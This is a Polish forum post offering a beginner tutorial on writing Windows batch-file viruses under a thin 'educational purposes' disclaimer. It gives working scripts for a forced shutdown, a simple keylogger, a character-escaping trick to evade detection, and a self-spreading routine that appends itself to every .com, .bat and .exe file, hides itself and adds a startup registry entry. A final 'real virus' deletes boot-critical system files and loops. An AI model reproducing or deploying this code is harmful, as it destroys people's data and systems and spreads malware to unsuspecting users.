[Pan Sowa]

O wirusach Cele edukacyjne only.

WIRUS BATCH - Hacking dla początkujących (cele edukacyjne).

Poradnik ma cele edukacyjne i autor nie odpowiada za wyrządzone przez niego szkody. Robicie to na własną odpowiedzialność!

Pewnie niejeden z Was próbował bawić się w wirusy .bat. Do tego wystarczy notatnik i chwila czasu. Niestety, te wirusy łatwo odnaleźć i rozpoznać. Pomogę Wam w implementacji szyfrowania i pokaże Wam różne przydatne komendy.

A więc, zacznijmy od struktury wirusa. Każdy wirus batch, zaczyna się od prostej komendy - @echo off - dzięki niej, polecenia nie będą wyświetlane na ekranie cmd.
Komenda "echo" służy do wyświetlania tekstu, po każdej komendzie "echo", następna linijka to powinno być "pause>nul". A więc, przykład prostego wirusa (choć nie do końca wirusa).

@ECHO OFF
TITLE W32.HK.S
ECHO tekst, który zostanie wyświetlony na ekranie
REM to jest komentarz
SHUTDOWN.EXE -S -T 10

Ten wirus wyłączy jedynie komputer.


Wyjaśnienie komend:

TITLE

z angielskiego, tytuł. Po prostu możesz nadać tytuł wirusowi. W32 to typ środowiska, HK - hack, S - shutdown.

ECHO

to co napiszesz w "echo" zostanie wyświetlone na ekranie.

REM

Zwykły komentarz. Nie zostanie nigdzie wyświetlony.

SHUTDOWN.exe

po prostu plik z *.*/windows odpowiadający za wyłączenie komputera. "10" to czas, po którym komputer ma być wyłączony.

Teraz czas na prosty keylogger.

@echo off
set /p keys=
echo %keys%>>c:\keys.txt
start keylogger.bat
exit

Ten wirus zapisze wszystko co wpiszemy w okienko DOS-a.


Komendy:

set /p keys=

czyli to co wpiszemy zostanie w zmiennej 'keys'

echo %keys%>>c:\keys.txt

zmienna 'keys' zostanie zapisana w katalogu C:\ w pliku keys.txt

start keylogger.bat

czyli po zapisaniu zmiennych 'odświeżenie'. Bez tej komendy, wirus się wyłączy.

exit

zamyka poprzednie okienko, z tym co wpisaliśmy.


A teraz, zanim przejdziemy do 'ostrych wirusów', troszkę o szyfrowaniu.

Szyfrowanie to banalna sprawa. Po prostu każdy znak otaczamy %l%, nie musi być akurat l, tam możecie wstawić własny znak (nie ten, który szyfrujecie, każdy znak szyfrujący musi być ten sam, np. %x% cały czas, nie możemy zrobić: %k% i potem %p% bo wtedy skrypt nie zadziała). Aby zaszyfrować literę "k", trzeba użyć kodu:

Cytat

%l%k%l%

Po szyfrowaniu zwykły plik:

@echo off
title VIR
echo HACK

Będzie wyglądać tak:

Cytat

%l%@%l%e%l%c%l%h%l%o%l% %l%o%l%f%l%f%l%
%l%t%l%i%l%t%l%l%l%e%l% %l%V%l%I%l%R%l%
%l%e%l%c%l%h%l%o%l% %l%H%l%A%l%C%l%K%l%

To jest najprostszy sposób szyfrowania plików batch. Żeby szyfrowanie było efektywniejsze, stosuj jedynie małe litery w swoich skryptach.


Implementacja i rozpowszechnianie wirusa.

Wirus to program, który szkodzi i rozprzestrzenia się, będąc praktycznie niemożliwym do usunięcia. Najlepsze wirusy (niestety nie w batch, asembler, język maszynowy to klucz do nich) ukrywają się w dowolnym fragmencie jakiegoś programu i są bardzo trudne do wykrycia. Aby je "załatwić", potrzebna jest "szczepionka antywirusowa" na dany plik. Zwykły antywirus nie pomoże. Ale skoro jesteśmy przy batch, czas na rozpowszechnianie i implementacje.

Ten kod umieść zawsze na końcu swojego wirusa.

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >>a.reg
pause>nul
ATTRIB +S +H +R KATALOG:\NAZWA_WIRUSA.bat
pause>nul
ctty nul
for %%i in (*.com) do copy %0+%%i %%i /y >nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul
for %%i in (*.exe) do copy %0+%%i %%i /y >nul

To jest najważniejsza część wirusa. Wirus zostaje dodany do rejestru, przy czym jest uruchamiany przy starcie i powiela się 24 godziny na dobę. Zostają mu nadane uprawnienia pliku systemowego i wirus automatycznie dokleja się na koniec każdego pliku .bat .com i .exe. Czyli jest praktycznie wszędzie. Teraz czas na prawdziwego wirusa batch. Podam przykład i wytłumaczę działanie.

@echo off
title W32.Batch.X
set /p x=
echo %x%>>c:\x.x.txt
pause>nul
rundll32.exe user,disableoemversion
pause>nul
pause>nul
rundll32.exe user,enableoemversion
echo You are hacked by Mr. Owl 
echo You are hacked by Mr. Owl 
echo You are hacked by Mr. Owl 
echo You are hacked by Mr. Owl 
echo You are hacked by Mr. Owl
echo You are hacked by Mr. Owl
echo You are hacked by Mr. Owl 
erase C:\IO.SYS 
erase C:\MSDOS.SYS 
erase C:\WINDOWS\WIN.COM
erase C:\WINDOWS\SYSTEM\VMM32\IOS.VXD
erase C:\WINDOWS\SYSTEM\VMM32.VXD
erase C:\WINDOWS\SYSTEM\KERNEL32.DLL
erase C:\WINDOWS\EXPLORER.EXE
erase C:\WINDOWS\SYSTEM\WINOA386.MOD
erase C:\WINDOWS\WIN.INI
erase C:\WINDOWS\SYSTEM.INI
rd C:\WINDOWS\Resources\Themes\Luna /s /q
echo goto end>>c:\autoexec.bat
pause>nul
:loop
echo HACK
goto loop
rundll32.exe krnl286.exe,ExitKernel
rundll32.exe krnl286.exe,FatalError
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >>a.reg
pause>nul
ATTRIB +S +H +R KATALOG:\NAZWA_WIRUSA.bat
pause>nul
@echo off
ctty nul
for %%i in (*.com) do copy %0+%%i %%i /y >nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul
for %%i in (*.exe) do copy %0+%%i %%i /y >nul

A teraz, wirus:

- usuwa pliki systemowe niezbędne do rozruchu systemu
- usuwa folder *.*/themes co jest równoznaczne z brakiem stylu w windowsie.
- zawiesza system na kilkanaście sekund i odwiesza
- wyświetla pętle z napisami "hack"
- natychmiastowo kończy sesje systemu windows (fatalerror exitkernel, jest to bardzo szybkie wyjście z systemu)
- wkleja się do rejestru jako autostart, jeżeli chcielibyśmy wejść w tryb awaryjny to nic nie da.
- rozpowszechnia się na dysku wklejając w pliki .exe .bat i .com niezbędne do działania systemu.
- ustawia atrybut na plik systemowy i nie jest możliwy do usunięcia

To tyle, powyższy wirus potrafi doszczętnie zniszczyć system. Mała wiedza wystarczy, żeby porządnie zaingerować w windowsa. Pamiętajcie, używacie tych "programów" na własna odpowiedzialność i autor nie odpowiada za szkody poniesione użytkowaniem. Nigdy nie uruchamiajcie swoich wirusów na swoich komputerach.

Efekt

Poniższe 2 zrzuty ekranowe pokazują efekt działania wirusa, po lewej stronie mamy czysty system (C:), a po prawej zainfekowany (E:). Jak widać na 2 zrzucie, wirus został zapisany do rejestru i zniszczył dużo systemu, także nie można nic zrobić, komputer jest zawieszony na ten czas. Po prawej stronie widać także kopie wirusa. Pliki systemowe niezbędne do działania systemu (żebyśmy mogli widzieć jak wirus niszczy) ukryłem i dodałem wyjątek w skrypcie, także prawe okienko (folder WINDOWS) jest prawie pusty i nie narzekajcie że to by nie działało.

1 obrazek przedstawia aktywacje wirusa. Użytkownik próbuje wyłączyć okienko lub coś w nie wpisać, nie mając pojęcia że tym aktywuje wirusa.



2 obrazek przedstawia sytuacje po restarcie systemu. Większość plików jest usunięta (oprócz wyjątków pozwalających na działanie systemu podczas działania wirusa). W rejestrze widzimy wpis do autostartu, przez co tryb awaryjny nas nie uratuje.

Użytkownik unbreak edytował ten post 05 marzec 2011 - 18:27